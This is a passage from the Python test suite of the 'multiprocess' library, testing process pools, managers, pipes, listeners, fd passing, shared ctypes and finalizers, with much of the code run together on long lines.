it.__next__) # SayWhenError seen at start of problematic chunk's results it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2) for i in range(6): self.assertEqual(next(it), i*i) self.assertRaises(SayWhenError, it.__next__) it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4) for i in range(4): self.assertEqual(next(it), i*i) self.assertRaises(SayWhenError, it.__next__) def test_imap_unordered(self): it = self.pool.imap_unordered(sqr, list(range(10))) self.assertEqual(sorted(it), list(map(sqr, list(range(10))))) it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100) self.assertEqual(sorted(it), list(map(sqr, list(range(1000))))) def test_imap_unordered_handle_iterable_exception(self): if self.TYPE == 'manager': self.skipTest('test not appropriate for {}'.format(self.TYPE)) # SayWhenError seen at the very first of the iterable it = self.pool.imap_unordered(sqr, exception_throwing_generator(1, -1), 1) self.assertRaises(SayWhenError, it.__next__) # again, make sure it's reentrant it = self.pool.imap_unordered(sqr, exception_throwing_generator(1, -1), 1) self.assertRaises(SayWhenError, it.__next__) it = self.pool.imap_unordered(sqr, exception_throwing_generator(10, 3), 1) expected_values = list(map(sqr, list(range(10)))) with self.assertRaises(SayWhenError): # imap_unordered makes it difficult to anticipate the SayWhenError for i in range(10): value = next(it) self.assertIn(value, expected_values) expected_values.remove(value) it = self.pool.imap_unordered(sqr, exception_throwing_generator(20, 7), 2) expected_values = list(map(sqr, list(range(20)))) with self.assertRaises(SayWhenError): for i in range(20): value = next(it) self.assertIn(value, expected_values) expected_values.remove(value) def test_make_pool(self): expected_error = (RemoteError if self.TYPE == 'manager' else ValueError) self.assertRaises(expected_error, self.Pool, -1) self.assertRaises(expected_error, self.Pool, 0) if self.TYPE != 'manager': p = self.Pool(3) try: 
self.assertEqual(3, len(p._pool)) finally: p.close() p.join() def test_terminate(self): result = self.pool.map_async( time.sleep, [0.1 for i in range(10000)], chunksize=1 ) self.pool.terminate() join = TimingWrapper(self.pool.join) join() # Sanity check the pool didn't wait for all tasks to finish self.assertLess(join.elapsed, 2.0) def test_empty_iterable(self): # See Issue 12157 p = self.Pool(1) self.assertEqual(p.map(sqr, []), []) self.assertEqual(list(p.imap(sqr, [])), []) self.assertEqual(list(p.imap_unordered(sqr, [])), []) self.assertEqual(p.map_async(sqr, []).get(), []) p.close() p.join() def test_context(self): if self.TYPE == 'processes': L = list(range(10)) expected = [sqr(i) for i in L] with self.Pool(2) as p: r = p.map_async(sqr, L) self.assertEqual(r.get(), expected) p.join() self.assertRaises(ValueError, p.map_async, sqr, L) @classmethod def _test_traceback(cls): raise RuntimeError(123) # some comment @unittest.skipIf(True, "fails with is_dill(obj, child=True)") def test_traceback(self): # We want ensure that the traceback from the child process is # contained in the traceback raised in the main process. 
if self.TYPE == 'processes': with self.Pool(1) as p: try: p.apply(self._test_traceback) except Exception as e: exc = e else: self.fail('expected RuntimeError') p.join() self.assertIs(type(exc), RuntimeError) self.assertEqual(exc.args, (123,)) cause = exc.__cause__ self.assertIs(type(cause), multiprocess.pool.RemoteTraceback) self.assertIn('raise RuntimeError(123) # some comment', cause.tb) with support.captured_stderr() as f1: try: raise exc except RuntimeError: sys.excepthook(*sys.exc_info()) self.assertIn('raise RuntimeError(123) # some comment', f1.getvalue()) # _helper_reraises_exception should not make the error # a remote exception with self.Pool(1) as p: try: p.map(sqr, exception_throwing_generator(1, -1), 1) except Exception as e: exc = e else: self.fail('expected SayWhenError') self.assertIs(type(exc), SayWhenError) self.assertIs(exc.__cause__, None) p.join() @classmethod def _test_wrapped_exception(cls): raise RuntimeError('foo') @unittest.skipIf(True, "fails with is_dill(obj, child=True)") def test_wrapped_exception(self): # Issue #20980: Should not wrap exception when using thread pool with self.Pool(1) as p: with self.assertRaises(RuntimeError): p.apply(self._test_wrapped_exception) p.join() def _test_map_no_failfast(self): # Issue #23992: the fail-fast behaviour when an exception is raised # during map() would make Pool.join() deadlock, because a worker # process would fill the result queue (after the result handler thread # terminated, hence not draining it anymore). t_start = time.time() with self.assertRaises(ValueError): with self.Pool(2) as p: try: p.map(raise_large_valuerror, [0, 1]) finally: time.sleep(0.5) p.close() p.join() # check that we indeed waited for all jobs self.assertGreater(time.time() - t_start, 0.9) def test_release_task_refs(self): # Issue #29861: task arguments and results should not be kept # alive after we are done with them. 
        objs = [CountedObject() for i in range(10)]
        refs = [weakref.ref(o) for o in objs]
        self.pool.map(identity, objs)

        del objs
        time.sleep(DELTA)  # let threaded cleanup code run
        # Every weakref must now be dead: nothing else holds the originals.
        self.assertEqual(set(wr() for wr in refs), {None})
        # With a process pool, copies of the objects are returned, check
        # they were released too.
        self.assertEqual(CountedObject.n_instances, 0)

def raising():
    # Helper task that always fails with KeyError.
    raise KeyError("key")

def unpickleable_result():
    # Helper task whose return value (a lambda) cannot be pickled.
    return lambda: 42

class _TestPoolWorkerErrors(BaseTestCase):
    ALLOWED_TYPES = ('processes', )

    def test_async_error_callback(self):
        # error_callback must receive the exception the task raised, and
        # res.get() must re-raise it in the caller.
        p = multiprocess.Pool(2)

        scratchpad = [None]
        def errback(exc):
            scratchpad[0] = exc

        res = p.apply_async(raising, error_callback=errback)
        self.assertRaises(KeyError, res.get)
        self.assertTrue(scratchpad[0])
        self.assertIsInstance(scratchpad[0], KeyError)

        p.close()
        p.join()

    def _test_unpickleable_result(self):
        # Leading underscore keeps unittest from collecting this test.
        from multiprocess.pool import MaybeEncodingError
        p = multiprocess.Pool(2)

        # Make sure we don't lose pool processes because of encoding errors.
        for iteration in range(20):

            scratchpad = [None]
            def errback(exc):
                scratchpad[0] = exc

            res = p.apply_async(unpickleable_result, error_callback=errback)
            self.assertRaises(MaybeEncodingError, res.get)
            wrapped = scratchpad[0]
            self.assertTrue(wrapped)
            self.assertIsInstance(scratchpad[0], MaybeEncodingError)
            self.assertIsNotNone(wrapped.exc)
            self.assertIsNotNone(wrapped.value)

        p.close()
        p.join()

class _TestPoolWorkerLifetime(BaseTestCase):
    ALLOWED_TYPES = ('processes', )

    def test_pool_worker_lifetime(self):
        # With maxtasksperchild=10 each worker retires after 10 tasks, so
        # running 100 tasks through 3 workers should replace them all.
        p = multiprocess.Pool(3, maxtasksperchild=10)
        self.assertEqual(3, len(p._pool))
        origworkerpids = [w.pid for w in p._pool]
        # Run many tasks so each worker gets replaced (hopefully)
        results = []
        for i in range(100):
            results.append(p.apply_async(sqr, (i, )))
        # Fetch the results and verify we got the right answers,
        # also ensuring all the tasks have completed.
for (j, res) in enumerate(results): self.assertEqual(res.get(), sqr(j)) # Refill the pool p._repopulate_pool() # Wait until all workers are alive # (countdown * DELTA = 5 seconds max startup process time) countdown = 50 while countdown and not all(w.is_alive() for w in p._pool): countdown -= 1 time.sleep(DELTA) finalworkerpids = [w.pid for w in p._pool] # All pids should be assigned. See issue #7805. self.assertNotIn(None, origworkerpids) self.assertNotIn(None, finalworkerpids) # Finally, check that the worker pids have changed self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids)) p.close() p.join() def test_pool_worker_lifetime_early_close(self): # Issue #10332: closing a pool whose workers have limited lifetimes # before all the tasks completed would make join() hang. p = multiprocess.Pool(3, maxtasksperchild=1) results = [] for i in range(6): results.append(p.apply_async(sqr, (i, 0.3))) p.close() p.join() # check the results for (j, res) in enumerate(results): self.assertEqual(res.get(), sqr(j)) # # Test of creating a customized manager class # from multiprocess.managers import BaseManager, BaseProxy, RemoteError class FooBar(object): def f(self): return 'f()' def g(self): raise ValueError def _h(self): return '_h()' def baz(): for i in range(10): yield i*i class IteratorProxy(BaseProxy): _exposed_ = ('__next__',) def __iter__(self): return self def __next__(self): return self._callmethod('__next__') class MyManager(BaseManager): pass MyManager.register('Foo', callable=FooBar) MyManager.register('Bar', callable=FooBar, exposed=('f', '_h')) MyManager.register('baz', callable=baz, proxytype=IteratorProxy) class _TestMyManager(BaseTestCase): ALLOWED_TYPES = ('manager',) def test_mymanager(self): manager = MyManager() manager.start() self.common(manager) manager.shutdown() # If the manager process exited cleanly then the exitcode # will be zero. Otherwise (after a short timeout) # terminate() is used, resulting in an exitcode of -SIGTERM. 
self.assertEqual(manager._process.exitcode, 0) def test_mymanager_context(self): with MyManager() as manager: self.common(manager) # bpo-30356: BaseManager._finalize_manager() sends SIGTERM # to the manager process if it takes longer than 1 second to stop. self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM)) def test_mymanager_context_prestarted(self): manager = MyManager() manager.start() with manager: self.common(manager) self.assertEqual(manager._process.exitcode, 0) def common(self, manager): foo = manager.Foo() bar = manager.Bar() baz = manager.baz() foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)] bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)] self.assertEqual(foo_methods, ['f', 'g']) self.assertEqual(bar_methods, ['f', '_h']) self.assertEqual(foo.f(), 'f()') self.assertRaises(ValueError, foo.g) self.assertEqual(foo._callmethod('f'), 'f()') self.assertRaises(RemoteError, foo._callmethod, '_h') self.assertEqual(bar.f(), 'f()') self.assertEqual(bar._h(), '_h()') self.assertEqual(bar._callmethod('f'), 'f()') self.assertEqual(bar._callmethod('_h'), '_h()') self.assertEqual(list(baz), [i*i for i in range(10)]) # # Test of connecting to a remote server and using xmlrpclib for serialization # _queue = pyqueue.Queue() def get_queue(): return _queue class QueueManager(BaseManager): '''manager class used by server process''' QueueManager.register('get_queue', callable=get_queue) class QueueManager2(BaseManager): '''manager class which specifies the same interface as QueueManager''' QueueManager2.register('get_queue') SERIALIZER = 'xmlrpclib' class _TestRemoteManager(BaseTestCase): ALLOWED_TYPES = ('manager',) values = ['hello world', None, True, 2.25, 'hall\xe5 v\xe4rlden', '\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442', b'hall\xe5 v\xe4rlden', ] result = values[:] @classmethod def _putter(cls, address, authkey): manager = QueueManager2( address=address, authkey=authkey, serializer=SERIALIZER ) 
manager.connect() queue = manager.get_queue() # Note that xmlrpclib will deserialize object as a list not a tuple queue.put(tuple(cls.values)) def test_remote(self): authkey = os.urandom(32) manager = QueueManager( address=(support.HOST, 0), authkey=authkey, serializer=SERIALIZER ) manager.start() p = self.Process(target=self._putter, args=(manager.address, authkey)) p.daemon = True p.start() manager2 = QueueManager2( address=manager.address, authkey=authkey, serializer=SERIALIZER ) manager2.connect() queue = manager2.get_queue() self.assertEqual(queue.get(), self.result) # Because we are using xmlrpclib for serialization instead of # pickle this will cause a serialization error. self.assertRaises(Exception, queue.put, time.sleep) # Make queue finalizer run before the server is stopped del queue manager.shutdown() class _TestManagerRestart(BaseTestCase): @classmethod def _putter(cls, address, authkey): manager = QueueManager( address=address, authkey=authkey, serializer=SERIALIZER) manager.connect() queue = manager.get_queue() queue.put('hello world') def test_rapid_restart(self): authkey = os.urandom(32) manager = QueueManager( address=(support.HOST, 0), authkey=authkey, serializer=SERIALIZER) srvr = manager.get_server() addr = srvr.address # Close the connection.Listener socket which gets opened as a part # of manager.get_server(). It's not needed for the test. 
srvr.listener.close() manager.start() p = self.Process(target=self._putter, args=(manager.address, authkey)) p.start() p.join() queue = manager.get_queue() self.assertEqual(queue.get(), 'hello world') del queue manager.shutdown() manager = QueueManager( address=addr, authkey=authkey, serializer=SERIALIZER) try: manager.start() except OSError as e: if e.errno != errno.EADDRINUSE: raise # Retry after some time, in case the old socket was lingering # (sporadic failure on buildbots) time.sleep(1.0) manager = QueueManager( address=addr, authkey=authkey, serializer=SERIALIZER) manager.shutdown() # # # SENTINEL = latin('') class _TestConnection(BaseTestCase): ALLOWED_TYPES = ('processes', 'threads') @classmethod def _echo(cls, conn): for msg in iter(conn.recv_bytes, SENTINEL): conn.send_bytes(msg) conn.close() def test_connection(self): conn, child_conn = self.Pipe() p = self.Process(target=self._echo, args=(child_conn,)) p.daemon = True p.start() seq = [1, 2.25, None] msg = latin('hello world') longmsg = msg * 10 arr = array.array('i', list(range(4))) if self.TYPE == 'processes': self.assertEqual(type(conn.fileno()), int) self.assertEqual(conn.send(seq), None) self.assertEqual(conn.recv(), seq) self.assertEqual(conn.send_bytes(msg), None) self.assertEqual(conn.recv_bytes(), msg) if self.TYPE == 'processes': buffer = array.array('i', [0]*10) expected = list(arr) + [0] * (10 - len(arr)) self.assertEqual(conn.send_bytes(arr), None) self.assertEqual(conn.recv_bytes_into(buffer), len(arr) * buffer.itemsize) self.assertEqual(list(buffer), expected) buffer = array.array('i', [0]*10) expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr)) self.assertEqual(conn.send_bytes(arr), None) self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize), len(arr) * buffer.itemsize) self.assertEqual(list(buffer), expected) buffer = bytearray(latin(' ' * 40)) self.assertEqual(conn.send_bytes(longmsg), None) try: res = conn.recv_bytes_into(buffer) except multiprocess.BufferTooShort 
as e: self.assertEqual(e.args, (longmsg,)) else: self.fail('expected BufferTooShort, got %s' % res) poll = TimingWrapper(conn.poll) self.assertEqual(poll(), False) self.assertTimingAlmostEqual(poll.elapsed, 0) self.assertEqual(poll(-1), False) self.assertTimingAlmostEqual(poll.elapsed, 0) self.assertEqual(poll(TIMEOUT1), False) self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1) conn.send(None) time.sleep(.1) self.assertEqual(poll(TIMEOUT1), True) self.assertTimingAlmostEqual(poll.elapsed, 0) self.assertEqual(conn.recv(), None) really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb conn.send_bytes(really_big_msg) self.assertEqual(conn.recv_bytes(), really_big_msg) conn.send_bytes(SENTINEL) # tell child to quit child_conn.close() if self.TYPE == 'processes': self.assertEqual(conn.readable, True) self.assertEqual(conn.writable, True) self.assertRaises(EOFError, conn.recv) self.assertRaises(EOFError, conn.recv_bytes) p.join() def test_duplex_false(self): reader, writer = self.Pipe(duplex=False) self.assertEqual(writer.send(1), None) self.assertEqual(reader.recv(), 1) if self.TYPE == 'processes': self.assertEqual(reader.readable, True) self.assertEqual(reader.writable, False) self.assertEqual(writer.readable, False) self.assertEqual(writer.writable, True) self.assertRaises(OSError, reader.send, 2) self.assertRaises(OSError, writer.recv) self.assertRaises(OSError, writer.poll) def test_spawn_close(self): # We test that a pipe connection can be closed by parent # process immediately after child is spawned. On Windows this # would have sometimes failed on old versions because # child_conn would be closed before the child got a chance to # duplicate it. 
conn, child_conn = self.Pipe() p = self.Process(target=self._echo, args=(child_conn,)) p.daemon = True p.start() child_conn.close() # this might complete before child initializes msg = latin('hello') conn.send_bytes(msg) self.assertEqual(conn.recv_bytes(), msg) conn.send_bytes(SENTINEL) conn.close() p.join() def test_sendbytes(self): if self.TYPE != 'processes': self.skipTest('test not appropriate for {}'.format(self.TYPE)) msg = latin('abcdefghijklmnopqrstuvwxyz') a, b = self.Pipe() a.send_bytes(msg) self.assertEqual(b.recv_bytes(), msg) a.send_bytes(msg, 5) self.assertEqual(b.recv_bytes(), msg[5:]) a.send_bytes(msg, 7, 8) self.assertEqual(b.recv_bytes(), msg[7:7+8]) a.send_bytes(msg, 26) self.assertEqual(b.recv_bytes(), latin('')) a.send_bytes(msg, 26, 0) self.assertEqual(b.recv_bytes(), latin('')) self.assertRaises(ValueError, a.send_bytes, msg, 27) self.assertRaises(ValueError, a.send_bytes, msg, 22, 5) self.assertRaises(ValueError, a.send_bytes, msg, 26, 1) self.assertRaises(ValueError, a.send_bytes, msg, -1) self.assertRaises(ValueError, a.send_bytes, msg, 4, -1) @classmethod def _is_fd_assigned(cls, fd): try: os.fstat(fd) except OSError as e: if e.errno == errno.EBADF: return False raise else: return True @classmethod def _writefd(cls, conn, data, create_dummy_fds=False): if create_dummy_fds: for i in range(0, 256): if not cls._is_fd_assigned(i): os.dup2(conn.fileno(), i) fd = reduction.recv_handle(conn) if msvcrt: fd = msvcrt.open_osfhandle(fd, os.O_WRONLY) os.write(fd, data) os.close(fd) @unittest.skipUnless(HAS_REDUCTION, "test needs multiprocess.reduction") def test_fd_transfer(self): if self.TYPE != 'processes': self.skipTest("only makes sense with processes") conn, child_conn = self.Pipe(duplex=True) p = self.Process(target=self._writefd, args=(child_conn, b"foo")) p.daemon = True p.start() self.addCleanup(support.unlink, support.TESTFN) with open(support.TESTFN, "wb") as f: fd = f.fileno() if msvcrt: fd = msvcrt.get_osfhandle(fd) 
reduction.send_handle(conn, fd, p.pid) p.join() with open(support.TESTFN, "rb") as f: self.assertEqual(f.read(), b"foo") @unittest.skipUnless(HAS_REDUCTION, "test needs multiprocess.reduction") @unittest.skipIf(sys.platform == "win32", "test semantics don't make sense on Windows") @unittest.skipIf(MAXFD <= 256, "largest assignable fd number is too small") @unittest.skipUnless(hasattr(os, "dup2"), "test needs os.dup2()") def test_large_fd_transfer(self): # With fd > 256 (issue #11657) if self.TYPE != 'processes': self.skipTest("only makes sense with processes") conn, child_conn = self.Pipe(duplex=True) p = self.Process(target=self._writefd, args=(child_conn, b"bar", True)) p.daemon = True p.start() self.addCleanup(support.unlink, support.TESTFN) with open(support.TESTFN, "wb") as f: fd = f.fileno() for newfd in range(256, MAXFD): if not self._is_fd_assigned(newfd): break else: self.fail("could not find an unassigned large file descriptor") os.dup2(fd, newfd) try: reduction.send_handle(conn, newfd, p.pid) finally: os.close(newfd) p.join() with open(support.TESTFN, "rb") as f: self.assertEqual(f.read(), b"bar") @classmethod def _send_data_without_fd(self, conn): os.write(conn.fileno(), b"\0") @unittest.skipUnless(HAS_REDUCTION, "test needs multiprocess.reduction") @unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows") def test_missing_fd_transfer(self): # Check that exception is raised when received data is not # accompanied by a file descriptor in ancillary data. 
if self.TYPE != 'processes': self.skipTest("only makes sense with processes") conn, child_conn = self.Pipe(duplex=True) p = self.Process(target=self._send_data_without_fd, args=(child_conn,)) p.daemon = True p.start() self.assertRaises(RuntimeError, reduction.recv_handle, conn) p.join() def test_context(self): a, b = self.Pipe() with a, b: a.send(1729) self.assertEqual(b.recv(), 1729) if self.TYPE == 'processes': self.assertFalse(a.closed) self.assertFalse(b.closed) if self.TYPE == 'processes': self.assertTrue(a.closed) self.assertTrue(b.closed) self.assertRaises(OSError, a.recv) self.assertRaises(OSError, b.recv) class _TestListener(BaseTestCase): ALLOWED_TYPES = ('processes',) def test_multiple_bind(self): for family in self.connection.families: l = self.connection.Listener(family=family) self.addCleanup(l.close) self.assertRaises(OSError, self.connection.Listener, l.address, family) def test_context(self): with self.connection.Listener() as l: with self.connection.Client(l.address) as c: with l.accept() as d: c.send(1729) self.assertEqual(d.recv(), 1729) if self.TYPE == 'processes': self.assertRaises(OSError, l.accept) class _TestListenerClient(BaseTestCase): ALLOWED_TYPES = ('processes', 'threads') @classmethod def _test(cls, address): conn = cls.connection.Client(address) conn.send('hello') conn.close() def test_listener_client(self): for family in self.connection.families: l = self.connection.Listener(family=family) p = self.Process(target=self._test, args=(l.address,)) p.daemon = True p.start() conn = l.accept() self.assertEqual(conn.recv(), 'hello') p.join() l.close() def test_issue14725(self): l = self.connection.Listener() p = self.Process(target=self._test, args=(l.address,)) p.daemon = True p.start() time.sleep(1) # On Windows the client process should by now have connected, # written data and closed the pipe handle by now. This causes # ConnectNamdedPipe() to fail with ERROR_NO_DATA. See Issue # 14725. 
        conn = l.accept()
        self.assertEqual(conn.recv(), 'hello')
        conn.close()
        p.join()
        l.close()

    def test_issue16955(self):
        # poll() must report data that was sent before the sender closed.
        for fam in self.connection.families:
            l = self.connection.Listener(family=fam)
            c = self.connection.Client(l.address)
            a = l.accept()
            a.send_bytes(b"hello")
            self.assertTrue(c.poll(1))
            a.close()
            c.close()
            l.close()

class _TestPoll(BaseTestCase):
    # Tests for Connection.poll() semantics on pipes.

    ALLOWED_TYPES = ('processes', 'threads')

    def test_empty_string(self):
        # An empty bytes message still counts as readable data, and
        # polling does not consume it.
        a, b = self.Pipe()
        self.assertEqual(a.poll(), False)
        b.send_bytes(b'')
        self.assertEqual(a.poll(), True)
        self.assertEqual(a.poll(), True)

    @classmethod
    def _child_strings(cls, conn, strings):
        # Child: send each message with a small delay, then close.
        for s in strings:
            time.sleep(0.1)
            conn.send_bytes(s)
        conn.close()

    def test_strings(self):
        # Messages must arrive whole and in order even when the reader
        # polls with short timeouts between messages.
        strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
        a, b = self.Pipe()
        p = self.Process(target=self._child_strings, args=(b, strings))
        p.start()

        for s in strings:
            for i in range(200):
                if a.poll(0.01):
                    break
            x = a.recv_bytes()
            self.assertEqual(s, x)

        p.join()

    @classmethod
    def _child_boundaries(cls, r):
        # Polling may "pull" a message in to the child process, but we
        # don't want it to pull only part of a message, as that would
        # corrupt the pipe for any other processes which might later
        # read from it.
r.poll(5) def test_boundaries(self): r, w = self.Pipe(False) p = self.Process(target=self._child_boundaries, args=(r,)) p.start() time.sleep(2) L = [b"first", b"second"] for obj in L: w.send_bytes(obj) w.close() p.join() self.assertIn(r.recv_bytes(), L) @classmethod def _child_dont_merge(cls, b): b.send_bytes(b'a') b.send_bytes(b'b') b.send_bytes(b'cd') def test_dont_merge(self): a, b = self.Pipe() self.assertEqual(a.poll(0.0), False) self.assertEqual(a.poll(0.1), False) p = self.Process(target=self._child_dont_merge, args=(b,)) p.start() self.assertEqual(a.recv_bytes(), b'a') self.assertEqual(a.poll(1.0), True) self.assertEqual(a.poll(1.0), True) self.assertEqual(a.recv_bytes(), b'b') self.assertEqual(a.poll(1.0), True) self.assertEqual(a.poll(1.0), True) self.assertEqual(a.poll(0.0), True) self.assertEqual(a.recv_bytes(), b'cd') p.join() # # Test of sending connection and socket objects between processes # @unittest.skipUnless(HAS_REDUCTION, "test needs multiprocess.reduction") class _TestPicklingConnections(BaseTestCase): ALLOWED_TYPES = ('processes',) @classmethod def tearDownClass(cls): from multiprocess import resource_sharer resource_sharer.stop(timeout=5) @classmethod def _listener(cls, conn, families): for fam in families: l = cls.connection.Listener(family=fam) conn.send(l.address) new_conn = l.accept() conn.send(new_conn) new_conn.close() l.close() l = socket.socket() l.bind((support.HOST, 0)) l.listen() conn.send(l.getsockname()) new_conn, addr = l.accept() conn.send(new_conn) new_conn.close() l.close() conn.recv() @classmethod def _remote(cls, conn): for (address, msg) in iter(conn.recv, None): client = cls.connection.Client(address) client.send(msg.upper()) client.close() address, msg = conn.recv() client = socket.socket() client.connect(address) client.sendall(msg.upper()) client.close() conn.close() def test_pickling(self): families = self.connection.families lconn, lconn0 = self.Pipe() lp = self.Process(target=self._listener, args=(lconn0, 
families)) lp.daemon = True lp.start() lconn0.close() rconn, rconn0 = self.Pipe() rp = self.Process(target=self._remote, args=(rconn0,)) rp.daemon = True rp.start() rconn0.close() for fam in families: msg = ('This connection uses family %s' % fam).encode('ascii') address = lconn.recv() rconn.send((address, msg)) new_conn = lconn.recv() self.assertEqual(new_conn.recv(), msg.upper()) rconn.send(None) msg = latin('This connection uses a normal socket') address = lconn.recv() rconn.send((address, msg)) new_conn = lconn.recv() buf = [] while True: s = new_conn.recv(100) if not s: break buf.append(s) buf = b''.join(buf) self.assertEqual(buf, msg.upper()) new_conn.close() lconn.send(None) rconn.close() lconn.close() lp.join() rp.join() @classmethod def child_access(cls, conn): w = conn.recv() w.send('all is well') w.close() r = conn.recv() msg = r.recv() conn.send(msg*2) conn.close() def test_access(self): # On Windows, if we do not specify a destination pid when # using DupHandle then we need to be careful to use the # correct access flags for DuplicateHandle(), or else # DupHandle.detach() will raise PermissionError. For example, # for a read only pipe handle we should use # access=FILE_GENERIC_READ. (Unfortunately # DUPLICATE_SAME_ACCESS does not work.) 
conn, child_conn = self.Pipe() p = self.Process(target=self.child_access, args=(child_conn,)) p.daemon = True p.start() child_conn.close() r, w = self.Pipe(duplex=False) conn.send(w) w.close() self.assertEqual(r.recv(), 'all is well') r.close() r, w = self.Pipe(duplex=False) conn.send(r) r.close() w.send('foobar') w.close() self.assertEqual(conn.recv(), 'foobar'*2) p.join() # # # class _TestHeap(BaseTestCase): ALLOWED_TYPES = ('processes',) def test_heap(self): iterations = 5000 maxblocks = 50 blocks = [] # create and destroy lots of blocks of different sizes for i in range(iterations): size = int(random.lognormvariate(0, 1) * 1000) b = multiprocess.heap.BufferWrapper(size) blocks.append(b) if len(blocks) > maxblocks: i = random.randrange(maxblocks) del blocks[i] # get the heap object heap = multiprocess.heap.BufferWrapper._heap # verify the state of the heap all = [] occupied = 0 heap._lock.acquire() self.addCleanup(heap._lock.release) for L in list(heap._len_to_seq.values()): for arena, start, stop in L: all.append((heap._arenas.index(arena), start, stop, stop-start, 'free')) for arena, start, stop in heap._allocated_blocks: all.append((heap._arenas.index(arena), start, stop, stop-start, 'occupied')) occupied += (stop-start) all.sort() for i in range(len(all)-1): (arena, start, stop) = all[i][:3] (narena, nstart, nstop) = all[i+1][:3] self.assertTrue((arena != narena and nstart == 0) or (stop == nstart)) def test_free_from_gc(self): # Check that freeing of blocks by the garbage collector doesn't deadlock # (issue #12352). # Make sure the GC is enabled, and set lower collection thresholds to # make collections more frequent (and increase the probability of # deadlock). 
if not gc.isenabled(): gc.enable() self.addCleanup(gc.disable) thresholds = gc.get_threshold() self.addCleanup(gc.set_threshold, *thresholds) gc.set_threshold(10) # perform numerous block allocations, with cyclic references to make # sure objects are collected asynchronously by the gc for i in range(5000): a = multiprocess.heap.BufferWrapper(1) b = multiprocess.heap.BufferWrapper(1) # circular references a.buddy = b b.buddy = a # # # class _Foo(Structure): _fields_ = [ ('x', c_int), ('y', c_double) ] class _TestSharedCTypes(BaseTestCase): ALLOWED_TYPES = ('processes',) def setUp(self): if not HAS_SHAREDCTYPES: self.skipTest("requires multiprocess.sharedctypes") @classmethod def _double(cls, x, y, foo, arr, string): x.value *= 2 y.value *= 2 foo.x *= 2 foo.y *= 2 string.value *= 2 for i in range(len(arr)): arr[i] *= 2 def test_sharedctypes(self, lock=False): x = Value('i', 7, lock=lock) y = Value(c_double, 1.0/3.0, lock=lock) foo = Value(_Foo, 3, 2, lock=lock) arr = self.Array('d', list(range(10)), lock=lock) string = self.Array('c', 20, lock=lock) string.value = latin('hello') p = self.Process(target=self._double, args=(x, y, foo, arr, string)) p.daemon = True p.start() p.join() self.assertEqual(x.value, 14) self.assertAlmostEqual(y.value, 2.0/3.0) self.assertEqual(foo.x, 6) self.assertAlmostEqual(foo.y, 4.0) for i in range(10): self.assertAlmostEqual(arr[i], i*2) self.assertEqual(string.value, latin('hellohello')) def test_synchronize(self): self.test_sharedctypes(lock=True) def test_copy(self): foo = _Foo(2, 5.0) bar = copy(foo) foo.x = 0 foo.y = 0 self.assertEqual(bar.x, 2) self.assertAlmostEqual(bar.y, 5.0) # # # class _TestFinalize(BaseTestCase): ALLOWED_TYPES = ('processes',) def setUp(self): self.registry_backup = util._finalizer_registry.copy() util._finalizer_registry.clear() def tearDown(self): self.assertFalse(util._finalizer_registry) util._finalizer_registry.update(self.registry_backup) @classmethod def _test_finalize(cls, conn): class Foo(object): 
pass a = Foo() util.Finalize(a, conn.send, args=('a',)) del a # triggers callback for a b = Foo() close_b = util.Finalize(b, conn.send, args=('b',)) close_b() # triggers callback for b close_b() # does nothing because callback has already been called del b # does nothing because callback has already been called c = Foo() util.Finalize(c, conn.send, args=('c',)) d10 = Foo() util.Finalize(d10, conn.send, args=('d10',), exitpriority=1) d01 = Foo() util.Finalize(d01, conn.send, args=('d01',), exitpriority=0) d02 = Foo() util.Finalize(d02, conn.send, args=('d02',), exitpriority=0) d03 = Foo() util.Finalize(d03, conn.send, args=('d03',), exitpriority=0) util.Finalize(None, conn.send, args=('e',), exitpriority=-10) util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100) # call multiprocess's cleanup function then exit process without # garbage collecting locals util._exit_function() conn.close() os._exit(0) def test_finalize(self): conn, child_conn = self.Pipe() p = self.Process(target=self._test_finalize, args=(child_conn,)) p.daemon = True p.start() p.join() result = [obj for obj in iter(conn.recv, 'STOP')] self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e']) def test_thread_safety(self): # bpo-24484: _run_finalizers() should be thread-safe def cb(): pass class Foo(object): def __init__(self): self.ref = self # create reference cycle # insert finalizer at random key util.Finalize(self, cb, exitpriority=random.randint(1, 100)) finish = False exc = None def run_finalizers(): nonlocal exc while not finish: time.sleep(random.random() * 1e-1) try: # A GC run will eventually happen during this, # collecting stale Foo's and mutating the registry util._run_finalizers() except Exception as e: exc = e def make_finalizers(): nonlocal exc d = {} while not finish: try: # Old Foo's get gradually replaced and later # collected by the GC (because of the cyclic ref) d[random.getrandbits(5)] = {Foo() for i in range(10)} except Exception as e: exc = e d.clear() 
old_interval = sys.getswitchinterval() old_threshold = gc.get_threshold() try: sys.setswitchinterval(1e-6) gc.set_threshold(5, 5, 5) threads = [threading.Thread(target=run_finalizers), threading.Thread(target=make_finalizers)] with support.start_threads(threads): time.sleep(4.0) # Wait a bit to trigger race condition finish = True if exc is not None: raise exc finally: sys.setswitchinterval(old_interval) gc.set_threshold(*old_threshold) gc.collect() # Collect remaining Foo's # # Test that from ... import * works for each module # class _TestImportStar(unittest.TestCase): def get_module_names(self): import glob folder = os.path.dirname(multiprocess.__file__) pattern = os.path.join(folder, '*.py') files = glob.glob(pattern) modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files] modules = ['multiprocess.' + m for m in modules] modules.remove('multiprocess.__init__') modules.append('multiprocess') return modules def test_import(self): modules = self.get_module_names() if sys.platform == 'win32': modules.remove('multiprocess.popen_fork') modules.remove('multiprocess.popen_forkserver') modules.remove('multiprocess.popen_spawn_posix') else: modules.remove('multiprocess.popen_spawn_win32') if not HAS_REDUCTION: modules.remove('multiprocess.popen_forkserver') if c_int is None: # This module requires _ctypes modules.remove('multiprocess.sharedctypes') for name in modules: __import__(name) mod = sys.modules[name] 